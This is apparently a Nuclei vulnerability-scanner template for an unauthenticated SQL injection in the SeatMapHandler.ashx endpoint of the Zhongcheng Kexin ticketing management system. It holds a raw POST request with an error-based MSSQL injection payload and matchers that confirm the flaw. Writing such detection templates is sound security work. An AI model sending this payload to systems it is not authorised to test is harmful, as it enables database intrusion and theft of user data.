id: zhongchengkexin-SeatMapHandler-sql

info:
  name: 中成科信票务管理系统 SeatMapHandler.ashx SQL注入漏洞
  author: Superhero
  severity: high
  description: 中成科信票务管理系统 SeatMapHandler.ashx 接囗处存在SQL注入漏洞复现，未经身份验证的恶意攻击者利用 SQL 注入漏洞获取数据库中的信息(例如管理员后台密码、站点用户个人信息)之外，攻击者甚至可以在高权限下向服务器写入命令，进一步获取服务器系统权限。
  tags: sql injection
  
http:
  - raw:
      - |
        POST /SystemManager/Comm/SeatMapHandler.ashx HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        Method=GetZoneInfo&solutionNo=%27+AND+7821+IN+%28SELECT+%28CHAR%28113%29%2BCHAR%28107%29%2BCHAR%28122%29%2BCHAR%28118%29%2BCHAR%28113%29%2B%28SELECT+%28CASE+WHEN+%287821%3D7821%29+THEN+CHAR%2849%29+ELSE+CHAR%2848%29+END%29%29%2BCHAR%28113%29%2BCHAR%28113%29%2BCHAR%28112%29%2BCHAR%28107%29%2BCHAR%28113%29%29%29--+Vjyh
   


    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - '转换成数据类型 int 时失败。'
      - type: status
        status: 
          - 200





